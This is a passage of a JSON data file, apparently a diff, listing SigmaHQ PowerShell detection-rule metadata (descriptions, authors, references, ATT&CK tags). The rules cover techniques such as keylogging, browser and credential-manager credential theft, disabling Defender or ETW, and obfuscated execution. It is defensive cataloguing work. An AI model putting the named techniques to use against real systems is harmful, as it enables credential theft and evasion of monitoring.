that domain..\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/28", + "falsepositive": [ + "Legitimate administrative script" + ], + "filename": "posh_ps_directoryservices_accountmanagement.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=dotnet-plat-ext-6.0", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.002/T1136.002.md#atomic-test-3---create-a-new-domain-account-using-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.002" + ] + }, + "uuid": "b29a93fb-087c-4b5b-a84d-ee3309e69d08", + "value": "Manipulation of User Computer or Group Security Principals Across AD" + }, + { + "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", + "meta": { + "author": "Ali Alwashali", + "creation_date": "2022/08/21", + "falsepositive": [ + "Legitimate script that disables the command history" + ], + "filename": "posh_ps_disable_psreadline_command_history.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/DissectMalware/status/1062879286749773824", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_disable_psreadline_command_history.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.003" + ] + }, + "uuid": "602f5669-6927-4688-84db-0d4b7afb2150", + "value": "Disable Powershell Command History" + }, + { + "description": "Adversaries may log user keystrokes to intercept credentials as the user types them.", + "meta": { + "author": "frack113", + "creation_date": "2021/07/30", + 
"falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_keylogging.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/src/Get-Keystrokes.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_keylogging.yml" + ], + "tags": [ + "attack.collection", + "attack.t1056.001" + ] + }, + "uuid": "34f90d3c-c297-49e9-b26d-911b05a4866c", + "value": "Powershell Keylogging" + }, + { + "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/30", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_access_to_browser_login_data.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_access_to_browser_login_data.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.003" + ] + }, + "uuid": "fc028194-969d-4122-8abe-0470d5b8f12f", + "value": "Access to Browser Login Data" + }, + { + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "meta": { + "author": "Nasreddine 
Bencherchali", + "creation_date": "2022/10/26", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_mailboxexport_share.yml", + "level": "critical", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://youtu.be/5mqid-7zp8k?t=2481", + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", + "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", + "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_mailboxexport_share.yml" + ], + "tags": [ + "attack.exfiltration" + ] + }, + "uuid": "4a241dea-235b-4a7e-8d76-50d817b146c4", + "value": "Suspicious PowerShell Mailbox Export to Share - PS" + }, + { + "description": "Detects powershell scripts that import modules from suspicious directories", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/07", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_import_module_susp_dirs.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_import_module_susp_dirs.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "21f9162c-5f5d-4b01-89a8-b705bd7d10ab", + "value": "Import PowerShell Modules From Suspicious Directories" + }, + { + "description": "Detect adversaries enumerate sensitive files", + "meta": { + "author": "frack113", + "creation_date": "2022/09/16", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_sensitive_file_discovery.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + 
"refs": [ + "https://twitter.com/malmoeb/status/1570814999370801158", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ] + }, + "uuid": "7d416556-6502-45b2-9bad-9d2f05f38997", + "value": "Powershell Sensitive File Discovery" + }, + { + "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/20", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_dump_password_windows_credential_manager.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_dump_password_windows_credential_manager.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555" + ] + }, + "uuid": "99c49d9c-34ea-45f7-84a7-4751ae6b2cbc", + "value": "Dump Credentials from Windows Credential Manager With PowerShell" + }, + { + "description": "Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.", + "meta": { + "author": "frack113", + "creation_date": "2022/01/23", + "falsepositive": [ + "Legitimate administrative script" + ], + "filename": "posh_ps_susp_ssl_keyword.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://medium.com/walmartglobaltech/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926", + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1573/T1573.md#atomic-test-1---openssl-c2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ssl_keyword.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1573" + ] + }, + "uuid": "195626f3-5f1b-4403-93b7-e6cfd4d6a078", + "value": "Suspicious SSL Connection" + }, + { + "description": "Detects usage of \"Reflection.Assembly\" load functions to dynamically load assemblies in memory", + "meta": { + "author": "frack113", + "creation_date": "2022/12/25", + "falsepositive": [ + "Legitimate use of the library" + ], + "filename": "posh_ps_dotnet_assembly_from_file.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=50", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_dotnet_assembly_from_file.yml" + ], + "tags": "No established tags" + }, + "uuid": "ddcd88cb-7f62-4ce5-86f9-1704190feb0a", + "value": "Potential In-Memory Execution Using Reflection.Assembly" + }, + { + "description": "Detecting use WinAPI Functions in PowerShell", + "meta": { + "author": "Nikita Nazarov, oscd.community, Tim Shelton", + "creation_date": "2020/10/06", + "falsepositive": [ + "Carbon PowerShell Module (https://github.com/webmd-health-services/Carbon)" + ], + "filename": "posh_ps_accessing_win_api.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_accessing_win_api.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.t1106" + ] + }, + "uuid": "03d83090-8cba-44a0-b02f-0b756a050306", + "value": "Accessing 
WinAPI in PowerShell" + }, + { + "description": "The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.\nThese include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/02/06", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_get_adreplaccount.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.006/T1003.006.md#atomic-test-2---run-dsinternals-get-adreplaccount", + "https://www.powershellgallery.com/packages/DSInternals", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adreplaccount.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.006" + ] + }, + "uuid": "060c3ef1-fd0a-4091-bf46-e7d625f60b73", + "value": "Suspicious Get-ADReplAccount" + }, + { + "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_etw_trace_evasion.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_etw_trace_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" + ] + }, + "uuid": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", + "value": "Disable of ETW Trace - Powershell" + }, + { + "description": "Detects use 
of Set-ExecutionPolicy to set insecure policies", + "meta": { + "author": "frack113", + "creation_date": "2021/10/20", + "falsepositive": [ + "Administrator script" + ], + "filename": "posh_ps_set_policies_to_unsecure_level.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", + "https://adsecurity.org/?p=2604", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "61d0475c-173f-4844-86f7-f3eebae1c66b", + "value": "Change PowerShell Policies to an Insecure Level - PowerShell" + }, + { + "description": "Enumerates Active Directory to determine computers that are joined to the domain", + "meta": { + "author": "frack113", + "creation_date": "2022/02/12", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_directorysearcher.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-15---enumerate-domain-computers-within-active-directory-using-directorysearcher", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_directorysearcher.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018" + ] + }, + "uuid": "1f6399cf-2c80-4924-ace1-6fcff3393480", + "value": "DirectorySearcher Powershell Exploitation" + }, + { + "description": "Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.", + "meta": { + "author": 
"frack113", + "creation_date": "2022/02/01", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_unblock_file.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-3---remove-the-zoneidentifier-alternate-data-stream", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_unblock_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.005" + ] + }, + "uuid": "5947497f-1aa4-41dd-9693-c9848d58727d", + "value": "Suspicious Unblock-File" + }, + { + "description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.", + "meta": { + "author": "frack113", + "creation_date": "2021/08/23", + "falsepositive": [ + "Admin script" + ], + "filename": "posh_ps_susp_win32_pnpentity.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1120/T1120.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_pnpentity.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1120" + ] + }, + "uuid": "b26647de-4feb-4283-af6b-6117661283c5", + "value": "Powershell Suspicious Win32_PnPEntity" + }, + { + "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/20", + 
"falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_enumerate_password_windows_credential_manager.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enumerate_password_windows_credential_manager.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555" + ] + }, + "uuid": "603c6630-5225-49c1-8047-26c964553e0e", + "value": "Enumerate Credentials from Windows Credential Manager With PowerShell" + }, + { + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2019/10/08", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_rundll32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", + "value": "Invoke-Obfuscation Via Use Rundll32 - PowerShell" + }, + { + "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "meta": { + "author": "frack113", + "creation_date": "2022/09/10", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_disable_windowsoptionalfeature.yml", + "level": "high", + "logsource.category": "ps_script", + 
"logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md", + "https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "99c4658d-2c5e-4d87-828d-7c066ca537c3", + "value": "Disable-WindowsOptionalFeature Command PowerShell" + }, + { + "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles.", + "meta": { + "author": "frack113", + "creation_date": "2021/08/18", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_trigger_profiles.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.013/T1546.013.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_trigger_profiles.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1546.013" + ] + }, + "uuid": "05b3e303-faf0-4f4a-9b30-46cc13e69152", + "value": "Powershell Trigger Profiles by Add_Content" + }, + { + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/05", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_tamper_defender_remove_mppreference.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + 
"https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_defender_remove_mppreference.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "ae2bdd58-0681-48ac-be7f-58ab4e593458", + "value": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging" + }, + { + "description": "Adversaries may abuse the Windows command shell for execution.\nThe Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.\nThe Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.\nCommon uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/02", + "falsepositive": [ + "Legitimate administration script" + ], + "filename": "posh_ps_susp_execute_batch_script.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.003/T1059.003.md#atomic-test-1---create-and-execute-batch-script", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_execute_batch_script.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ] + }, + "uuid": "b5522a23-82da-44e5-9c8b-e10ed8955f88", + "value": "Powershell Execute Batch Script" + }, + { + "description": "Detects all variations of obfuscated powershell IEX 
invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", + "meta": { + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "creation_date": "2019/11/08", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_obfuscated_iex.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", + "value": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell" + }, + { + "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", + "meta": { + "author": "frack113", + "creation_date": "2022/08/19", + "falsepositive": [ + "Legitimate use" + ], + "filename": "posh_ps_modify_group_policy_settings.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_modify_group_policy_settings.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1484.001" + ] + }, + "uuid": "b7216a7d-687e-4c8d-82b1-3080b2ad961f", + "value": "Modify Group Policy Settings - ScriptBlockLogging" + }, + { + "description": "Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.", + "meta": { + "author": "frack113", + "creation_date": "2021/09/02", + 
"falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_store_file_in_alternate_data_stream.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_store_file_in_alternate_data_stream.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "a699b30e-d010-46c8-bbd1-ee2e26765fe9", + "value": "Powershell Store File In Alternate Data Stream" + }, + { + "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.\nScreen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/28", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_capture_screenshots.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-6---windows-screen-capture-copyfromscreen", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_capture_screenshots.yml" + ], + "tags": [ + "attack.collection", + "attack.t1113" + ] + }, + "uuid": "d4a11f63-2390-411c-9adf-d791fd152830", + "value": "Windows Screen Capture with CopyFromScreen" + }, + { + "description": "Detects suspicious PowerShell download command", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/05", + "falsepositive": [ + "PowerShell scripts that download content from the Internet" + ], + "filename": "posh_ps_susp_download.yml", + "level": "medium", + "logsource.category": "ps_script", + 
"logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_download.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "403c2cc0-7f6b-4925-9423-bfa573bed7eb", + "value": "Suspicious PowerShell Download - Powershell Script" + }, + { + "description": "Powershell Remove-Item with -Path to delete a file or a folder with \"-Recurse\"", + "meta": { + "author": "frack113", + "creation_date": "2022/01/15", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_remove_item_path.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Remove-Item?view=powershell-5.1&viewFallbackFrom=powershell-7", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remove_item_path.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ] + }, + "uuid": "b8af5f36-1361-4ebe-9e76-e36128d947bf", + "value": "Use Remove-Item to Delete File" + }, + { + "description": "Detects PowerShell calling a credential prompt", + "meta": { + "author": "John Lambert (idea), Florian Roth (rule)", + "creation_date": "2017/04/09", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_prompt_credentials.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://t.co/ezOTGy1a1G", + "https://twitter.com/JohnLaTwC/status/850381440629981184", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_prompt_credentials.yml" + ], + "tags": [ + "attack.credential_access", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": 
"ca8b77a9-d499-4095-b793-5d5f330d450e", + "value": "PowerShell Credential Prompt" + }, + { + "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", + "meta": { + "author": "frack113", + "creation_date": "2022/01/07", + "falsepositive": [ + "Legitimate script" + ], + "filename": "posh_ps_invoke_command_remote.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/invoke-command?view=powershell-7.2", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-2---invoke-command", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_command_remote.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.006" + ] + }, + "uuid": "7b836d7f-179c-4ba4-90a7-a7e60afb48e6", + "value": "Execute Invoke-command on Remote Host" + }, + { + "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", + "meta": { + "author": "Borna Talebi", + "creation_date": "2021/09/14", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_add_dnsclient_rule.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/NathanMcNulty/status/1569497348841287681", + "https://docs.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml" + ], + "tags": [ + "attack.impact", + "attack.t1565" + ] + }, + 
"uuid": "4368354e-1797-463c-bc39-a309effbe8d7", + "value": "Powershell Add Name Resolution Policy Table Rule" + }, + { + "description": "Detects keywords from well-known PowerShell exploitation frameworks", + "meta": { + "author": "Sean Metcalf (source), Florian Roth (rule)", + "creation_date": "2017/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_malicious_keywords.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://adsecurity.org/?p=2921", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_keywords.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "f62176f3-8128-4faa-bf6c-83261322e5eb", + "value": "Malicious PowerShell Keywords" + }, + { + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_var.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_var.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "0adfbc14-0ed1-11eb-adc1-0242ac120002", + "value": "Invoke-Obfuscation VAR+ Launcher - PowerShell" + }, + { + "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", + "meta": { + 
"author": "frack113", + "creation_date": "2021/12/15", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_ad_group_reco.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ad_group_reco.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": "88f0884b-331d-403d-a3a1-b668cf035603", + "value": "AD Groups Or Users Enumeration Using PowerShell - ScriptBlock" + }, + { + "description": "Detects usage of the \"Write-EventLog\" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/16", + "falsepositive": [ + "Legitimate applications writing events via this cmdlet. 
